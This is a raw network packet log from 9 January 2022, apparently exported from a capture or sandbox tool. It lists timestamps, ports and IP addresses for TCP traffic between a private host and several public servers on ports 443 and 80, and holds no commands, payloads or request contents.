Jan 9, 2022 18:48:12.438930035 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438956022 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438992023 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439001083 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439053059 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439066887 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439079046 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439105034 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439171076 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439174891 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439193964 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439248085 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439376116 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439450979 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439459085 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439475060 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439524889 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439543009 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439615011 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439682007 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439729929 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439742088 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439754963 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439763069 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439794064 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439811945 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439881086 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.439899921 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.439970016 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440045118 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440136909 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440201044 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440228939 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440241098 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440257072 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440262079 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440296888 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440308094 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440323114 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440721035 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440759897 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440817118 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440830946 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.440846920 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.440943003 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441013098 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441073895 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441095114 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441107988 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441135883 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441211939 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441379070 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441519022 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441555023 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441601038 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441612959 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441658020 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441894054 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.441904068 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441925049 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441979885 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.441981077 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442053080 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442065954 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442156076 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442280054 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442290068 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442329884 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442379951 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442394018 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442431927 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442708015 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442750931 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442790031 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442823887 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442836046 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.442845106 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.442883015 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.443063021 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.443409920 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.459547997 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459599018 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459655046 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.459672928 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459686041 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.459820032 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459856987 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459903002 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.459917068 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.459930897 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460145950 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460159063 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460418940 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460469007 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460490942 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460505009 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460562944 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460756063 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460794926 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460836887 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460850000 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.460866928 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.460911036 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.461215973 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461256027 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461314917 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.461328030 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461343050 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.461394072 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.461699963 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461736917 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461792946 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.461806059 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.461821079 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462106943 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462141991 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462197065 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462209940 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462225914 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462272882 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462531090 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462570906 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462621927 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462634087 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462649107 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.462940931 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.462989092 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463041067 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463054895 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463069916 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463377953 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463416100 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463469982 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463485956 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463502884 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463540077 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463778019 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463815928 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463866949 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.463881016 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.463896036 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.464057922 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.464154005 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.464205027 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.464240074 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.464253902 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.464268923 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.464304924 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.464365005 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.465429068 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.465461016 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.465472937 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.465485096 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:14.740108013 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:14.917339087 CET	80	49817	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:14.917438984 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:14.917591095 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:14.917614937 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.095313072 CET	80	49817	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.474877119 CET	80	49817	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.474931955 CET	80	49817	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.475176096 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.484091997 CET	49817	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.550649881 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.661309958 CET	80	49817	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.721174002 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.721276045 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.721410990 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.721590996 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:15.891438007 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:15.891577005 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.276000023 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.276045084 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.276169062 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.276500940 CET	49818	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.308413029 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.446506977 CET	80	49818	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.489063025 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.489173889 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.489274979 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.489496946 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:16.669683933 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:16.669804096 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:17.059037924 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:17.059098959 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:17.059216976 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:17.059396982 CET	49819	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:17.084265947 CET	49820	80	192.168.2.3	188.166.28.199
Jan 9, 2022 18:48:17.239815950 CET	80	49819	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:20.093516111 CET	49820	80	192.168.2.3	188.166.28.199
Jan 9, 2022 18:48:23.092711926 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:23.340540886 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:23.340687037 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:23.340739965 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:23.340749025 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:23.588680983 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.632983923 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.633043051 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.633135080 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:24.881237984 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.881300926 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.881340027 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.881381035 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:24.881481886 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:24.881535053 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.129576921 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129641056 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129684925 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129724026 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129762888 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129787922 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.129803896 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129822016 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.129843950 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.129846096 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129884958 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.129931927 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378043890 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378104925 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378145933 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378186941 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378226042 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378222942 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378253937 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378288031 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378330946 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378338099 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378371954 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378412008 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378449917 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378489017 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378499031 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378508091 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.378529072 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378556967 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.378566027 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.422065973 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.626899958 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.626962900 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627002001 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627042055 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627082109 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627105951 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627121925 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627141953 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627162933 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627163887 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627201080 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627242088 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627249002 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627281904 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627317905 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627329111 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627358913 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627398014 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627404928 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627438068 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627477884 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627481937 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627515078 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627554893 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627564907 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627593994 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627630949 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627638102 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627671003 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627712011 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627717018 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627757072 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627798080 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627834082 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627867937 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627882957 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627892971 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627909899 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627948046 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.627954006 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.627988100 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.628031969 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.875978947 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876044035 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876085043 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876126051 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876164913 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876204014 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876215935 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876240969 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876245022 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876246929 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876286030 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876326084 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876332998 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876364946 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876404047 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876414061 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876445055 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876483917 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876490116 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876523018 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876564026 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876578093 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876602888 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876643896 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876647949 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876682997 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876720905 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876729012 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876761913 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876801014 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876811981 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876841068 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876888037 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.876943111 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.876983881 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877021074 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877037048 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.877060890 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877099037 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877104044 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.877139091 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877170086 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:25.877183914 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:25.922205925 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.109730005 CET	49820	80	192.168.2.3	188.166.28.199
Jan 9, 2022 18:48:26.144922972 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.144982100 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145021915 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145060062 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145076990 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145100117 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145116091 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145138979 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145179987 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145186901 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145220041 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145258904 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145272970 CET	49842	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:26.145298004 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145337105 CET	80	49842	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:26.145347118 CET	49842	80	192.168.2.3	211.169.6.249
